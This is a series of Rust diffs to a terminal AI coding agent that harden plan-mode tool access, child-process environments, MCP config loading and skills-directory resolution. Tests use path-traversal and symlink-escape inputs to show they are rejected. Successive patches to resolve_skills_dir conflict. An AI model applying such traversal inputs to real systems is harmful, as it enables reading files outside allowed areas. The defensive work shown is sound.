+        unsafe fn restore_var(key: &str, value: Option<OsString>) {
+            if let Some(value) = value {
+                unsafe { std::env::set_var(key, value) };
+            } else {
+                unsafe { std::env::remove_var(key) };
+            }
+        }
+    }
+
+    impl Drop for IsolatedHome {
+        fn drop(&mut self) {
+            // SAFETY: the shared test env mutex is still held while Drop runs.
+            unsafe {
+                Self::restore_var("HOME", self.home_prev.take());
+                Self::restore_var("USERPROFILE", self.userprofile_prev.take());
+            }
+        }
+    }
 
     fn create_test_app_with_tmpdir(tmpdir: &TempDir) -> App {
         let options = TuiOptions {
@@ -486,6 +532,7 @@ mod tests {
     #[test]
     fn test_list_skills_empty_directory() {
         let tmpdir = TempDir::new().unwrap();
+        let _home = IsolatedHome::new(&tmpdir);
         let mut app = create_test_app_with_tmpdir(&tmpdir);
         let result = list_skills(&mut app, None);
         assert!(result.message.is_some());
@@ -497,6 +544,7 @@ mod tests {
     #[test]
     fn test_list_skills_with_skills() {
         let tmpdir = TempDir::new().unwrap();
+        let _home = IsolatedHome::new(&tmpdir);
         create_skill_dir(
             &tmpdir,
             "test-skill",
@@ -513,6 +561,7 @@ mod tests {
     #[test]
     fn test_list_skills_merges_workspace_and_configured_dirs() {
         let tmpdir = TempDir::new().unwrap();
+        let _home = IsolatedHome::new(&tmpdir);
         let workspace_skill_dir = tmpdir
             .path()
             .join(".agents")
@@ -541,6 +590,7 @@ mod tests {
     #[test]
     fn test_skill_subcommand_dispatch_install_usage() {
         let tmpdir = TempDir::new().unwrap();
+        let _home = IsolatedHome::new(&tmpdir);
         let mut app = create_test_app_with_tmpdir(&tmpdir);
         // Empty install spec → usage hint, not invalid-source error.
         let result = run_skill(&mut app, Some("install"));
@@ -551,6 +601,7 @@ mod tests {
     #[test]
     fn test_skill_subcommand_dispatch_uninstall_missing() {
         let tmpdir = TempDir::new().unwrap();
+        let _home = IsolatedHome::new(&tmpdir);
         let mut app = create_test_app_with_tmpdir(&tmpdir);
         let result = run_skill(&mut app, Some("uninstall absent-skill"));
         let msg = result.message.unwrap();
@@ -560,6 +611,7 @@ mod tests {
     #[test]
     fn test_run_skill_without_name() {
         let tmpdir = TempDir::new().unwrap();
+        let _home = IsolatedHome::new(&tmpdir);
         let mut app = create_test_app_with_tmpdir(&tmpdir);
         let result = run_skill(&mut app, None);
         assert!(result.message.is_some());
@@ -569,6 +621,7 @@ mod tests {
     #[test]
     fn test_run_skill_not_found() {
         let tmpdir = TempDir::new().unwrap();
+        let _home = IsolatedHome::new(&tmpdir);
         let mut app = create_test_app_with_tmpdir(&tmpdir);
         let result = run_skill(&mut app, Some("nonexistent"));
         assert!(result.message.is_some());
@@ -579,6 +632,7 @@ mod tests {
     #[test]
     fn test_run_skill_activates() {
         let tmpdir = TempDir::new().unwrap();
+        let _home = IsolatedHome::new(&tmpdir);
         create_skill_dir(
             &tmpdir,
             "test-skill",

--- a/crates/tui/src/core/engine.rs
+++ b/crates/tui/src/core/engine.rs
@@ -1539,7 +1539,7 @@ impl Engine {
             let _ = self
                 .tx_event
                 .send(Event::status(format!(
-                    "Failed to connect MCP server '{server}': {err}"
+                    "Failed to connect MCP server '{server}': {err:#}"
                 )))
                 .await;
         }

--- a/crates/tui/src/core/engine/tests.rs
+++ b/crates/tui/src/core/engine/tests.rs
@@ -2,6 +2,7 @@ use super::*;
 
 use crate::models::SystemBlock;
 use crate::test_support::lock_test_env;
+use crate::tools::spec::ToolCapability;
 use serde_json::json;
 use std::collections::HashSet;
 use std::ffi::OsString;
@@ -451,8 +452,40 @@ fn turn_tool_registry_builder_keeps_plan_mode_read_only_for_files() {
     assert!(!registry.contains("exec_shell"));
     assert!(!registry.contains("exec_shell_wait"));
     assert!(!registry.contains("exec_shell_interact"));
+    assert!(!registry.contains("task_shell_start"));
+    assert!(!registry.contains("task_create"));
+    assert!(!registry.contains("task_gate_run"));
+    assert!(!registry.contains("rlm"));
+    assert!(!registry.contains("fim_edit"));
     assert!(registry.contains("update_plan"));
-    assert!(registry.contains("task_create"));
+    assert!(registry.contains("task_list"));
+    assert!(registry.contains("task_read"));
+
+    let plan_state_tools = [
+        "checklist_add",
+        "checklist_update",
+        "checklist_write",
+        "todo_add",
+        "todo_update",
+        "todo_write",
+        "update_plan",
+    ];
+    let mut write_or_exec_tools: Vec<String> = registry
+        .all()
+        .into_iter()
+        .filter(|tool| !plan_state_tools.contains(&tool.name()))
+        .filter(|tool| {
+            let capabilities = tool.capabilities();
+            capabilities.contains(&ToolCapability::WritesFiles)
+                || capabilities.contains(&ToolCapability::ExecutesCode)
+        })
+        .map(|tool| tool.name().to_string())
+        .collect();
+    write_or_exec_tools.sort();
+    assert!(
+        write_or_exec_tools.is_empty(),
+        "Plan mode must not register file-writing or code-execution tools: {write_or_exec_tools:?}"
+    );
 }
 
 #[test]

--- a/crates/tui/src/core/engine/tool_catalog.rs
+++ b/crates/tui/src/core/engine/tool_catalog.rs
@@ -35,8 +35,8 @@ pub(super) fn should_default_defer_tool(name: &str, mode: AppMode) -> bool {
 
     // Shell exec tools are kept active in Agent so the model can run
     // verification commands (build/test/git/cargo) without first having to
-    // discover them through ToolSearch. Plan mode may register shell tools,
-    // but keeps most shell execution deferred and network-restricted.
+    // discover them through ToolSearch. Plan mode does not register shell
+    // execution tools.
     let always_loaded_in_action_modes = matches!(mode, AppMode::Agent)
         && matches!(
             name,

--- a/crates/tui/src/core/engine/tool_setup.rs
+++ b/crates/tui/src/core/engine/tool_setup.rs
@@ -48,7 +48,7 @@ impl Engine {
                 .with_diagnostics_tool()
                 .with_skill_tools()
                 .with_validation_tools()
-                .with_runtime_task_tools()
+                .with_runtime_read_only_task_tools()
                 .with_todo_tool(todo_list)
                 .with_plan_tool(plan_state)
         } else {
@@ -60,10 +60,14 @@ impl Engine {
 
         builder = builder
             .with_review_tool(self.deepseek_client.clone(), self.session.model.clone())
-            .with_rlm_tool(self.deepseek_client.clone(), self.session.model.clone())
-            .with_fim_tool(self.deepseek_client.clone(), self.session.model.clone())
             .with_user_input_tool()
             .with_parallel_tool();
+
+        if mode != AppMode::Plan {
+            builder = builder
+                .with_rlm_tool(self.deepseek_client.clone(), self.session.model.clone())
+                .with_fim_tool(self.deepseek_client.clone(), self.session.model.clone());
+        }
 
         if self.config.features.enabled(Feature::ApplyPatch) && mode != AppMode::Plan {
             builder = builder.with_patch_tools();

--- a/crates/tui/src/localization.rs
+++ b/crates/tui/src/localization.rs
@@ -270,6 +270,7 @@ pub enum MessageId {
     CmdLspDescription,
     CmdShareDescription,
     CmdUndoDescription,
+    CmdVerboseDescription,
     CmdYoloDescription,
     CmdCacheAdvice,
     CmdCacheFootnote,
@@ -460,6 +461,7 @@ pub const ALL_MESSAGE_IDS: &[MessageId] = &[
     MessageId::CmdLspDescription,
     MessageId::CmdShareDescription,
     MessageId::CmdUndoDescription,
+    MessageId::CmdVerboseDescription,
     MessageId::CmdYoloDescription,
     MessageId::CmdCacheAdvice,
     MessageId::CmdCacheFootnote,
@@ -800,6 +802,7 @@ fn english(id: MessageId) -> &'static str {
             "Manage workspace trust and per-path allowlist (`/trust add <path>`, `/trust list`, `/trust on|off`)"
         }
         MessageId::CmdUndoDescription => "Remove last message pair",
+        MessageId::CmdVerboseDescription => "Toggle full live thinking in the transcript",
         MessageId::CmdYoloDescription => "Enable YOLO mode (shell + trust + auto-approve)",
         MessageId::CmdCacheAdvice => {
             "Hit/miss ratios over ~70% after the third turn indicate a stable cache prefix; \n\
@@ -1086,6 +1089,7 @@ fn japanese(id: MessageId) -> Option<&'static str> {
             "ワークスペースの信頼設定とパス別許可リストを管理（`/trust add <path>`、`/trust list`、`/trust on|off`）"
         }
         MessageId::CmdUndoDescription => "最後のメッセージ対を削除",
+        MessageId::CmdVerboseDescription => "ライブ思考表示の詳細モードを切り替え",
         MessageId::CmdYoloDescription => "YOLO モードを有効化（shell + 信頼 + 自動承認）",
         MessageId::CmdCacheAdvice => {
             "3 ターン目以降にヒット率が ~70% 以上で安定していれば、プレフィックスキャッシュは健全。\n\
@@ -1344,6 +1348,7 @@ fn chinese_simplified(id: MessageId) -> Option<&'static str> {
             "管理工作区信任与按路径的白名单（`/trust add <path>`、`/trust list`、`/trust on|off`）"
         }
         MessageId::CmdUndoDescription => "移除最后一组消息对",
+        MessageId::CmdVerboseDescription => "切换实时思考内容的完整显示",
         MessageId::CmdYoloDescription => "启用 YOLO 模式（shell + 信任 + 自动批准）",
         MessageId::CmdCacheAdvice => {
             "第 3 轮起命中率稳定在 ~70% 以上即表示前缀缓存稳定；\n\
@@ -1618,6 +1623,7 @@ fn portuguese_brazil(id: MessageId) -> Option<&'static str> {
             "Gerenciar a confiança do workspace e a allowlist por caminho (`/trust add <path>`, `/trust list`, `/trust on|off`)"
         }
         MessageId::CmdUndoDescription => "Remover o último par de mensagens",
+        MessageId::CmdVerboseDescription => "Alternar pensamento ao vivo completo no transcript",
         MessageId::CmdYoloDescription => {
             "Ativar o modo YOLO (shell + confiança + aprovação automática)"
         }

--- a/crates/tui/src/main.rs
+++ b/crates/tui/src/main.rs
@@ -16,6 +16,7 @@ mod acp_server;
 mod audit;
 mod auto_reasoning;
 mod automation_manager;
+mod child_env;
 mod client;
 mod command_safety;
 mod commands;
@@ -3548,9 +3549,7 @@ fn run_sandbox_command(args: SandboxArgs) -> Result<()> {
         .current_dir(&exec_env.cwd)
         .stdout(Stdio::piped())
         .stderr(Stdio::piped());
-    for (key, value) in &exec_env.env {
-        cmd.env(key, value);
-    }
+    child_env::apply_to_command(&mut cmd, child_env::string_map_env(&exec_env.env));
 
     let mut child = cmd
         .spawn()

--- a/crates/tui/src/main.rs
+++ b/crates/tui/src/main.rs
@@ -1732,11 +1732,10 @@ async fn run_doctor(config: &Config, workspace: &Path, config_path_override: Opt
         std::io::stdout().flush().ok();
 
         match test_api_connectivity(config).await {
-            Ok(model) => {
+            Ok(()) => {
                 println!(
-                    "\r  {} API connection successful (model: {})",
-                    "✓".truecolor(aqua_r, aqua_g, aqua_b),
-                    model
+                    "\r  {} API connection successful",
+                    "✓".truecolor(aqua_r, aqua_g, aqua_b)
                 );
             }
             Err(e) => {
@@ -2544,7 +2543,7 @@ async fn run_models(config: &Config, args: ModelsArgs) -> Result<()> {
 }
 
 /// Test API connectivity by making a minimal request
-async fn test_api_connectivity(config: &Config) -> Result<String> {
+async fn test_api_connectivity(config: &Config) -> Result<()> {
     use crate::client::DeepSeekClient;
     use crate::models::{ContentBlock, Message, MessageRequest};
 
@@ -2576,7 +2575,7 @@ async fn test_api_connectivity(config: &Config) -> Result<String> {
     // Use tokio timeout to catch hanging requests
     let timeout_duration = std::time::Duration::from_secs(15);
     match tokio::time::timeout(timeout_duration, client.create_message(request)).await {
-        Ok(Ok(_response)) => Ok(model),
+        Ok(Ok(_response)) => Ok(()),
         Ok(Err(e)) => Err(e),
         Err(_) => anyhow::bail!("Request timeout after 15 seconds"),
     }
@@ -3742,17 +3741,13 @@ fn recover_interrupted_checkpoint_for_resume(launch_workspace: &Path) -> Option<
         // sessions`, then clear it so the next launch in this folder doesn't
         // re-trip the nag. Print a one-line notice pointing at the explicit
         // resume command — but DO NOT auto-load the session here.
-        let session_id_for_notice = session.metadata.id.clone();
         let _ = manager.save_session(&session);
         let _ = manager.clear_checkpoint();
         eprintln!(
-            "Note: an interrupted session ({}…) from another workspace ({}) is \
-             available. Run `deepseek resume {}` from there to recover it, or \
-             use `deepseek sessions` to list all saved sessions. Starting fresh \
-             in {}.",
-            &session_id_for_notice.chars().take(8).collect::<String>(),
+            "Note: an interrupted session from another workspace ({}) is \
+             available. Run `deepseek sessions` to list saved sessions. Starting \
+             fresh in {}.",
             session_workspace.display(),
-            session_id_for_notice,
             launch_workspace.display(),
         );
         return None;
@@ -3786,27 +3781,22 @@ fn preserve_interrupted_checkpoint_for_explicit_resume(launch_workspace: &Path) 
         return;
     };
 
-    let session_id = session.metadata.id.clone();
     let session_workspace = session.metadata.workspace.clone();
     let _ = manager.save_session(&session);
     let _ = manager.clear_checkpoint();
 
     let age_str = checkpoint_age_label(age);
-    let short_id = session_id.chars().take(8).collect::<String>();
     if session_manager::workspace_scope_matches(&session_workspace, launch_workspace) {
         eprintln!(
-            "Found an in-flight session snapshot ({age_str}, {short_id}…). \
-             Starting a new session. Run `deepseek resume {session_id}` or \
-             `deepseek --continue` to resume it."
+            "Found an in-flight session snapshot ({age_str}). Starting a new \
+             session. Run `deepseek --continue` to resume it."
         );
     } else {
         eprintln!(
-            "Note: an interrupted session ({short_id}…) from another workspace ({}) \
-             is available. Run `deepseek resume {}` from there to recover it, or \
-             use `deepseek sessions` to list all saved sessions. Starting fresh \
-             in {}.",
+            "Note: an interrupted session from another workspace ({}) is \
+             available. Run `deepseek sessions` to list saved sessions. Starting \
+             fresh in {}.",
             session_workspace.display(),
-            session_id,
             launch_workspace.display(),
         );
     }

--- a/crates/tui/src/main.rs
+++ b/crates/tui/src/main.rs
@@ -3256,7 +3256,7 @@ async fn run_mcp_command(config: &Config, command: McpCommand) -> Result<()> {
                     println!("Connected to all configured MCP servers.");
                 } else {
                     for (name, err) in errors {
-                        eprintln!("Failed to connect {name}: {err}");
+                        eprintln!("Failed to connect {name}: {err:#}");
                     }
                 }
             }
@@ -3373,7 +3373,7 @@ async fn run_mcp_command(config: &Config, command: McpCommand) -> Result<()> {
             }
             eprintln!("MCP validation failed:");
             for (name, err) in errors {
-                eprintln!("  - {name}: {err}");
+                eprintln!("  - {name}: {err:#}");
             }
             bail!("one or more MCP servers failed validation");
         }

--- a/crates/tui/src/main.rs
+++ b/crates/tui/src/main.rs
@@ -438,6 +438,9 @@ struct ServeArgs {
     /// `DEEPSEEK_RUNTIME_TOKEN` when omitted.
     #[arg(long = "auth-token", value_name = "TOKEN")]
     auth_token: Option<String>,
+    /// Disable runtime API auth when no token is configured. Only use on a trusted loopback.
+    #[arg(long = "insecure")]
+    insecure_no_auth: bool,
 }
 
 #[derive(Subcommand, Debug, Clone)]
@@ -749,6 +752,7 @@ async fn main() -> Result<()> {
                             workers: args.workers.clamp(1, 8),
                             cors_origins,
                             auth_token: args.auth_token,
+                            insecure_no_auth: args.insecure_no_auth,
                         },
                     )
                     .await

--- a/crates/tui/src/mcp.rs
+++ b/crates/tui/src/mcp.rs
@@ -16,6 +16,7 @@ use serde::{Deserialize, Serialize};
 use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
 use tokio::process::{Child, ChildStdin, ChildStdout};
 
+use crate::child_env;
 use crate::network_policy::{Decision, NetworkPolicyDecider, host_from_url};
 use crate::utils::write_atomic;
 
@@ -666,9 +667,7 @@ impl McpConnection {
                 .stderr(std::process::Stdio::null())
                 .kill_on_drop(true);
 
-            for (key, value) in &config.env {
-                cmd.env(key, value);
-            }
+            child_env::apply_to_tokio_command(&mut cmd, child_env::string_map_env(&config.env));
 
             let mut child = cmd.spawn().with_context(|| {
                 let env_keys: Vec<&str> = config.env.keys().map(String::as_str).collect();

--- a/crates/tui/src/mcp.rs
+++ b/crates/tui/src/mcp.rs
@@ -7,7 +7,7 @@
 
 use std::collections::{HashMap, VecDeque};
 use std::fs;
-use std::path::Path;
+use std::path::{Component, Path};
 use std::sync::atomic::{AtomicU64, Ordering};
 use std::time::Duration;
 
@@ -23,6 +23,19 @@ use crate::utils::write_atomic;
 
 /// Bytes of a non-2xx response body to surface in connection errors.
 const ERROR_BODY_PREVIEW_BYTES: usize = 200;
+
+fn validate_mcp_config_path(path: &Path) -> Result<()> {
+    if path.as_os_str().is_empty() {
+        anyhow::bail!("MCP config path cannot be empty");
+    }
+    if path
+        .components()
+        .any(|component| matches!(component, Component::ParentDir))
+    {
+        anyhow::bail!("MCP config path cannot contain '..' components");
+    }
+    Ok(())
+}
 
 /// Mask a URL so any embedded credentials in the userinfo portion (e.g.
 /// `https://user:secret@host`) are replaced with `***`. Failures fall back to
@@ -1046,6 +1059,7 @@ impl McpPool {
 
     /// Create a pool from a configuration file path
     pub fn from_config_path(path: &std::path::Path) -> Result<Self> {
+        validate_mcp_config_path(path)?;
         let config = if path.exists() {
             let contents = fs::read_to_string(path)
                 .with_context(|| format!("Failed to read MCP config: {}", path.display()))?;
@@ -1605,6 +1619,7 @@ pub struct McpManagerSnapshot {
 }
 
 pub fn load_config(path: &Path) -> Result<McpConfig> {
+    validate_mcp_config_path(path)?;
     if !path.exists() {
         return Ok(McpConfig::default());
     }
@@ -1615,6 +1630,7 @@ pub fn load_config(path: &Path) -> Result<McpConfig> {
 }
 
 pub fn save_config(path: &Path, cfg: &McpConfig) -> Result<()> {
+    validate_mcp_config_path(path)?;
     if let Some(parent) = path.parent() {
         fs::create_dir_all(parent).with_context(|| {
             format!("Failed to create MCP config directory {}", parent.display())
@@ -1969,6 +1985,15 @@ mod tests {
         assert_eq!(snapshot.servers[0].name, "disabled");
         assert!(!snapshot.servers[0].enabled);
         assert_eq!(snapshot.servers[0].error.as_deref(), Some("disabled"));
+    }
+
+    #[test]
+    fn test_mcp_config_rejects_traversal_path() {
+        let err = load_config(Path::new("../mcp.json")).expect_err("traversal path should fail");
+        assert!(
+            format!("{err:#}").contains("cannot contain '..'"),
+            "got: {err:#}"
+        );
     }
 
     #[test]

--- a/crates/tui/src/mcp.rs
+++ b/crates/tui/src/mcp.rs
@@ -667,7 +667,12 @@ impl McpConnection {
                 .stderr(std::process::Stdio::null())
                 .kill_on_drop(true);
 
-            child_env::apply_to_tokio_command(&mut cmd, child_env::string_map_env(&config.env));
+            // MCP stdio servers are user-configured integrations. Use the
+            // wider MCP allowlist so common Node/Python/proxy/CA-bundle
+            // bootstrap variables (NVM_DIR, NODE_OPTIONS, NPM_CONFIG_*,
+            // HTTP(S)_PROXY, …) reach the child. See `sanitized_mcp_env`
+            // and #1244 for context.
+            child_env::apply_to_tokio_command_mcp(&mut cmd, child_env::string_map_env(&config.env));
 
             let mut child = cmd.spawn().with_context(|| {
                 let env_keys: Vec<&str> = config.env.keys().map(String::as_str).collect();
@@ -1761,7 +1766,7 @@ pub async fn discover_manager_snapshot(
         .connect_all()
         .await
         .into_iter()
-        .map(|(name, err)| (name, err.to_string()))
+        .map(|(name, err)| (name, format!("{err:#}")))
         .collect::<HashMap<_, _>>();
     Ok(snapshot_from_config(
         path,
@@ -2105,6 +2110,47 @@ mod tests {
         let pool = McpPool::new(McpConfig::default());
         assert!(pool.server_names().is_empty());
         assert!(pool.all_tools().is_empty());
+    }
+
+    /// #1244: when an MCP stdio server fails to spawn, the underlying OS
+    /// error (e.g. ENOENT for a missing binary) must reach the user via the
+    /// snapshot.error string. Regression test for `err.to_string()` dropping
+    /// the anyhow chain — without `{err:#}` the user sees only the opaque
+    /// wrapper "MCP stdio spawn failed (...)" and has nothing to act on.
+    #[tokio::test]
+    async fn discover_snapshot_includes_underlying_spawn_error_in_chain() {
+        let dir = tempfile::tempdir().unwrap();
+        let path = dir.path().join("mcp.json");
+        fs::write(
+            &path,
+            r#"{
+                "mcpServers": {
+                    "broken": {
+                        "command": "deepseek-tui-test-this-binary-does-not-exist-9f8e7d6c5b4a",
+                        "args": []
+                    }
+                }
+            }"#,
+        )
+        .unwrap();
+
+        let snapshot = discover_manager_snapshot(&path, None, false).await.unwrap();
+        let server = snapshot
+            .servers
+            .iter()
+            .find(|s| s.name == "broken")
+            .expect("broken server should appear in snapshot");
+        let err = server
+            .error
+            .as_deref()
+            .expect("broken server should have an error");
+        let lowered = err.to_lowercase();
+        assert!(
+            lowered.contains("os error")
+                || lowered.contains("not found")
+                || lowered.contains("no such"),
+            "expected underlying spawn error in chain, got: {err}"
+        );
     }
 
     #[test]

--- a/crates/tui/src/prompts.rs
+++ b/crates/tui/src/prompts.rs
@@ -614,12 +614,31 @@ mod tests {
         assert!(prompt.contains("Approval Policy: Suggest"));
     }
 
+    /// Gate against shipping a release with a missing CHANGELOG entry — which
+    /// is exactly what happened with v0.8.21 / v0.8.22 (entries had to be
+    /// backfilled in v0.8.23). Asserts the top-of-file CHANGELOG contains a
+    /// `## [X.Y.Z]` heading matching the current `CARGO_PKG_VERSION`. No
+    /// hardcoded version string — the test self-updates with the workspace
+    /// version bump and only fires when the CHANGELOG is the missing piece.
     #[test]
-    fn package_version_is_current_hotfix_release() {
-        assert_eq!(
-            env!("CARGO_PKG_VERSION"),
-            "0.8.22",
-            "0.8.22 release branch must report the release version before publishing"
+    fn changelog_entry_exists_for_current_package_version() {
+        let version = env!("CARGO_PKG_VERSION");
+        let changelog_path = std::path::Path::new(env!("CARGO_MANIFEST_DIR"))
+            .join("..")
+            .join("..")
+            .join("CHANGELOG.md");
+        let contents = std::fs::read_to_string(&changelog_path).unwrap_or_else(|err| {
+            panic!(
+                "failed to read CHANGELOG.md at {}: {err}",
+                changelog_path.display()
+            )
+        });
+        let header = format!("## [{version}]");
+        assert!(
+            contents.contains(&header),
+            "CHANGELOG.md is missing a `{header}` entry for the current package \
+             version. Add a release section at the top before tagging — see \
+             docs/RELEASE_CHECKLIST.md."
         );
     }
 

--- a/crates/tui/src/repl/runtime.rs
+++ b/crates/tui/src/repl/runtime.rs
@@ -16,6 +16,7 @@
 //! that happens to contain "REQ" or "FINAL" can't be confused with control
 //! messages.
 
+use std::ffi::OsString;
 use std::path::{Path, PathBuf};
 use std::process::Stdio;
 use std::time::{Duration, Instant};
@@ -24,6 +25,8 @@ use serde::{Deserialize, Serialize};
 use tokio::io::{AsyncBufReadExt, AsyncWriteExt, BufReader};
 use tokio::process::{Child, ChildStdin, ChildStdout, Command};
 use uuid::Uuid;
+
+use crate::child_env;
 
 // ---------------------------------------------------------------------------
 // Public types
@@ -192,9 +195,15 @@ impl PythonRuntime {
             .stderr(Stdio::piped())
             .kill_on_drop(true);
 
-        if let Some(path) = context_path {
-            cmd.env("RLM_CONTEXT_FILE", path);
-        }
+        let context_env = context_path
+            .map(|path| {
+                vec![(
+                    OsString::from("RLM_CONTEXT_FILE"),
+                    path.as_os_str().to_os_string(),
+                )]
+            })
+            .unwrap_or_default();
+        child_env::apply_to_tokio_command(&mut cmd, context_env);
 
         let mut child = cmd
             .spawn()

--- a/crates/tui/src/runtime_api.rs
+++ b/crates/tui/src/runtime_api.rs
@@ -1602,30 +1602,23 @@ fn run_git(workspace: &std::path::Path, args: &[&str]) -> Option<String> {
 }
 
 fn resolve_skills_dir(config: &Config, workspace: &std::path::Path) -> PathBuf {
-    let agents_skills = workspace.join(".agents").join("skills");
-    if agents_skills.exists() {
-        return agents_skills;
-    }
-    let local_skills = workspace.join("skills");
-    if local_skills.exists() {
-        return local_skills;
+    let workspace = fs::canonicalize(workspace).unwrap_or_else(|_| workspace.to_path_buf());
+    for candidate in [
+        workspace.join(".agents").join("skills"),
+        workspace.join("skills"),
+    ] {
+        if let Ok(candidate) = fs::canonicalize(candidate)
+            && candidate.is_dir()
+        {
+            return candidate;
+        }
     }
     config.skills_dir()
 }
 
 fn load_mcp_config_or_default(path: &std::path::Path) -> Result<McpConfig, ApiError> {
-    if !path.exists() {
-        return Ok(McpConfig::default());
-    }
-    let raw = fs::read_to_string(path).map_err(|e| {
-        ApiError::internal(format!("Failed to read MCP config {}: {e}", path.display()))
-    })?;
-    serde_json::from_str::<McpConfig>(&raw).map_err(|e| {
-        ApiError::internal(format!(
-            "Failed to parse MCP config {}: {e}",
-            path.display()
-        ))
-    })
+    crate::mcp::load_config(path)
+        .map_err(|e| ApiError::internal(format!("Failed to load MCP config: {e:#}")))
 }
 
 #[derive(Debug, Deserialize)]
@@ -3046,11 +3039,10 @@ mod tests {
         let root = std::env::temp_dir().join(format!("deepseek-session-resume-{}", Uuid::new_v4()));
         let sessions_dir = root.join("sessions");
         fs::create_dir_all(&sessions_dir)?;
-        let session_id = "sess_test_resume";
         let session = json!({
             "schema_version": 1,
             "metadata": {
-                "id": session_id,
+                "id": "sess_test_resume",
                 "title": "Test resume session",
                 "created_at": "2025-01-01T00:00:00Z",
                 "updated_at": "2025-01-01T00:10:00Z",
@@ -3073,7 +3065,7 @@ mod tests {
             "system_prompt": null
         });
         fs::write(
-            sessions_dir.join(format!("{session_id}.json")),
+            sessions_dir.join("sess_test_resume.json"),
             serde_json::to_string_pretty(&session)?,
         )?;
 
@@ -3086,14 +3078,14 @@ mod tests {
 
         let resp = client
             .post(format!(
-                "http://{addr}/v1/sessions/{session_id}/resume-thread"
+                "http://{addr}/v1/sessions/sess_test_resume/resume-thread"
             ))
             .json(&json!({ "model": "deepseek-v4-pro" }))
             .send()
             .await?;
         assert_eq!(resp.status(), StatusCode::CREATED);
         let resumed: serde_json::Value = resp.json().await?;
-        assert_eq!(resumed["session_id"], session_id);
+        assert_eq!(resumed["session_id"], "sess_test_resume");
         assert_eq!(resumed["message_count"], 2);
 
         let thread_id = resumed["thread_id"]

--- a/crates/tui/src/runtime_api.rs
+++ b/crates/tui/src/runtime_api.rs
@@ -1658,15 +1658,27 @@ fn run_git(workspace: &std::path::Path, args: &[&str]) -> Option<String> {
 }
 
 fn resolve_skills_dir(config: &Config, workspace: &std::path::Path) -> PathBuf {
-    let workspace = fs::canonicalize(workspace).unwrap_or_else(|_| workspace.to_path_buf());
+    // Canonicalize the workspace once so the symlink-containment check below
+    // compares like-for-like. If the workspace can't be canonicalized at all
+    // (e.g. it doesn't exist on disk yet) fall back to the configured global
+    // skills dir rather than risk constructing paths from a non-existent root.
+    let canonical_workspace = match fs::canonicalize(workspace) {
+        Ok(path) => path,
+        Err(_) => return config.skills_dir(),
+    };
     for candidate in [
-        workspace.join(".agents").join("skills"),
-        workspace.join("skills"),
+        canonical_workspace.join(".agents").join("skills"),
+        canonical_workspace.join("skills"),
     ] {
-        if let Ok(candidate) = fs::canonicalize(candidate)
-            && candidate.is_dir()
+        // Re-canonicalize the candidate so a `.agents/skills` symlink to e.g.
+        // `/etc` cannot promote arbitrary filesystem locations into the
+        // skills directory. The candidate must still resolve under the
+        // canonicalized workspace root after symlink expansion.
+        if let Ok(canon) = fs::canonicalize(&candidate)
+            && canon.starts_with(&canonical_workspace)
+            && canon.is_dir()
         {
-            return candidate;
+            return canon;
         }
     }
     config.skills_dir()
@@ -3689,5 +3701,67 @@ mod tests {
 
         handle.abort();
         Ok(())
+    }
+
+    #[test]
+    fn resolve_skills_dir_finds_workspace_local_agents_skills() {
+        let tmp = tempfile::tempdir().expect("tempdir");
+        let workspace = tmp.path();
+        let local_skills = workspace.join(".agents").join("skills");
+        fs::create_dir_all(&local_skills).expect("create skills dir");
+
+        let config = Config::default();
+        let resolved = resolve_skills_dir(&config, workspace);
+
+        let expected = fs::canonicalize(&local_skills).expect("canonical local skills");
+        assert_eq!(resolved, expected);
+    }
+
+    #[test]
+    fn resolve_skills_dir_finds_workspace_local_skills_fallback() {
+        let tmp = tempfile::tempdir().expect("tempdir");
+        let workspace = tmp.path();
+        let local_skills = workspace.join("skills");
+        fs::create_dir_all(&local_skills).expect("create skills dir");
+
+        let config = Config::default();
+        let resolved = resolve_skills_dir(&config, workspace);
+
+        let expected = fs::canonicalize(&local_skills).expect("canonical local skills");
+        assert_eq!(resolved, expected);
+    }
+
+    /// A `skills` symlink that points outside the workspace must NOT be
+    /// returned as the resolved skills directory. Containment check ensures
+    /// the canonicalized candidate stays under the canonicalized workspace
+    /// root, so a malicious or misconfigured symlink can't promote
+    /// `/etc` (or any other path) into the skills loader.
+    #[cfg(unix)]
+    #[test]
+    fn resolve_skills_dir_rejects_symlink_escaping_workspace() {
+        let tmp = tempfile::tempdir().expect("tempdir");
+        let workspace_root = tmp.path().join("workspace");
+        let escape_target = tmp.path().join("escape_target");
+        fs::create_dir_all(&workspace_root).expect("create workspace");
+        fs::create_dir_all(&escape_target).expect("create escape target");
+
+        let dotagents = workspace_root.join(".agents");
+        fs::create_dir_all(&dotagents).expect("create .agents");
+        let bad_link = dotagents.join("skills");
+        std::os::unix::fs::symlink(&escape_target, &bad_link).expect("symlink");
+
+        let config = Config::default();
+        let resolved = resolve_skills_dir(&config, &workspace_root);
+
+        let canon_escape = fs::canonicalize(&escape_target).expect("canon escape");
+        assert_ne!(
+            resolved, canon_escape,
+            "symlink escaping workspace must not be resolved as skills dir"
+        );
+        assert_eq!(
+            resolved,
+            config.skills_dir(),
+            "with no valid in-workspace skills dir, resolution should fall back to config"
+        );
     }
 }

--- a/crates/tui/src/runtime_api.rs
+++ b/crates/tui/src/runtime_api.rs
@@ -1658,18 +1658,30 @@ fn run_git(workspace: &std::path::Path, args: &[&str]) -> Option<String> {
 }
 
 fn resolve_skills_dir(config: &Config, workspace: &std::path::Path) -> PathBuf {
-    let workspace = fs::canonicalize(workspace).unwrap_or_else(|_| workspace.to_path_buf());
+    let configured_skills_dir = config.skills_dir();
+    let trusted_root = fs::canonicalize(&configured_skills_dir).unwrap_or(configured_skills_dir.clone());
+
+    let workspace = match fs::canonicalize(workspace) {
+        Ok(path) => path,
+        Err(_) => return configured_skills_dir,
+    };
+
+    if !workspace.starts_with(&trusted_root) {
+        return configured_skills_dir;
+    }
+
     for candidate in [
         workspace.join(".agents").join("skills"),
         workspace.join("skills"),
     ] {
         if let Ok(candidate) = fs::canonicalize(candidate)
+            && candidate.starts_with(&trusted_root)
             && candidate.is_dir()
         {
             return candidate;
         }
     }
-    config.skills_dir()
+    configured_skills_dir
 }
 
 fn load_mcp_config_or_default(path: &std::path::Path) -> Result<McpConfig, ApiError> {

--- a/crates/tui/src/runtime_api.rs
+++ b/crates/tui/src/runtime_api.rs
@@ -76,6 +76,8 @@ pub struct RuntimeApiOptions {
     /// Optional bearer token required for `/v1/*` routes. If omitted here,
     /// `run_http_server` also checks `DEEPSEEK_RUNTIME_TOKEN`.
     pub auth_token: Option<String>,
+    /// Allow `/v1/*` routes without auth when no token is configured.
+    pub insecure_no_auth: bool,
 }
 
